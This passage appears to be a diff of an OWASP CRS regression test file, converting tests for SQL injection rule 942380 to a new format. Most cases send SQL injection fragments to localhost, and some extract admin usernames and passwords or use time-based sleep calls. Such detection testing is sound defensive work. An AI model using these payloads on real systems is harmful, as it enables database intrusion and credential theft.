- desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - 